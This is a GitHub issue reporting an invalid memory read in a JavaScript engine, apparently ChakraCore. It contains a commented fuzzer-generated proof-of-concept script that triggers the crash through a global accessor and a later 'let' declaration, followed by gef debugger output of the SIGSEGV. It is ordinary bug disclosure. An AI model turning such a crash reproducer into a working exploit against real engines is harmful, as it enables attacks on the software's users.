
Invalid_memory_read_1 #6644

Open
bird8693 opened this issue Mar 17, 2021 · 0 comments


Environment

ubuntu16

PoC (proof of concept, as reported)

// Fuzzer-style reproducer, reproduced as reported. It defines a numeric global
// property `x`, later replaces it with an accessor from inside Check(), runs
// long warm-up loops, and finally declares a lexical `let x` at script scope on
// the same name. The reported crash appears to depend on this exact statement
// order and iteration counts (presumably to drive the engine's JIT tiers), so
// the script is documented here rather than restructured.
//
// At the top level of a classic (non-module, non-strict) script `this` is the
// global object, so this creates a plain data property `x` on it.
this.x = 4660;
// `n` is never declared, so this assignment creates/overwrites an implicit
// global each call.
function Ctor() {
    n = new Set();
}
function Check() {
    // Called without a receiver, so in sloppy mode `this` is again the global
    // object: the data property `x` is replaced by an accessor whose setter
    // discards every write.
    this.__defineSetter__('x', () => {
    });
    // The remaining statements produce no observable result; they are
    // presumably present only to influence how Check() is compiled.
    var mWaN = new Number();
    var Bjfc = ~-Infinity;
    parseInt();
}
// First warm-up phase: 2000 iterations, each containing a 100000-iteration
// inner loop with no effect (2e8 trivial iterations in total).
for (var i = 0; i < 2000; ++i) {
    Ctor();
    var WGey = DataView;
    var yPDd = new Boolean();
    for (var ijjkkk = 0; ijjkkk < 100000; ++ijjkkk) {
        var EdHR = Proxy;
    }
    Check();
    var TmET = !673720360;
    // Every element is coerced with ToUint32: negative, fractional and
    // out-of-range values wrap modulo 2^32, so the resulting array is
    // well-defined and the literal itself is not the crash site.
    var wcwb = new Uint32Array([
        -9007199254740992,
        3037000498,
        4294967297,
        -9007199254740991,
        2147483649,
        1e-15,
        2147483648
    ]);
}
// Second warm-up phase: only Check() (re-installing the setter) is repeated.
for (var i = 0; i < 2000; ++i) {
    Check();
    var yPDd = new Boolean();
}
Ctor();
// A script-scope `let` on a name that already exists as a configurable
// accessor property of the global object. Per the language this is permitted
// and creates a separate lexical binding; the interaction between that binding
// and the accessor installed by Check() looks like the trigger for the
// reported invalid read — confirm against the engine's global-binding code.
let x = 1;
Check();

gef output at the crash (SIGSEGV in thread "ch")

   0x7ffff7e4540c                  mov    rax, rdi
   0x7ffff7e4540f                  shr    rax, 0x30
   0x7ffff7e45413                  jne    0x7ffff7e45ba1
 → 0x7ffff7e45419                  mov    rax, QWORD PTR [rdi+0x8]
   0x7ffff7e4541d                  mov    rax, QWORD PTR [rax+0x18]
   0x7ffff7e45421                  movabs rdx, 0x7ffff7f26020
   0x7ffff7e4542b                  mov    rsi, 0x10000001
   0x7ffff7e45432                  mov    QWORD PTR [rsp+0x10], rdx
   0x7ffff7e45437                  mov    QWORD PTR [rsp+0x8], rsi
─────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, Name: "ch", stopped 0x7ffff7e45419 in ?? (), reason: SIGSEGV
[#1] Id 2, Name: "ch", stopped 0x7ffff73d1360 in pthread_cond_wait@@GLIBC_2.3.2 (), reason: SIGSEGV
[#2] Id 3, Name: "ch", stopped 0x7ffff73d1709 in pthread_cond_timedwait@@GLIBC_2.3.2 (), reason: SIGSEGV
[#3] Id 4, Name: "ch", stopped 0x7ffff73d1709 in pthread_cond_timedwait@@GLIBC_2.3.2 (), reason: SIGSEGV
───────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
[#0] 0x7ffff7e45419 → mov rax, QWORD PTR [rdi+0x8]
[#1] 0x7fff00000002 → add BYTE PTR [rax], al
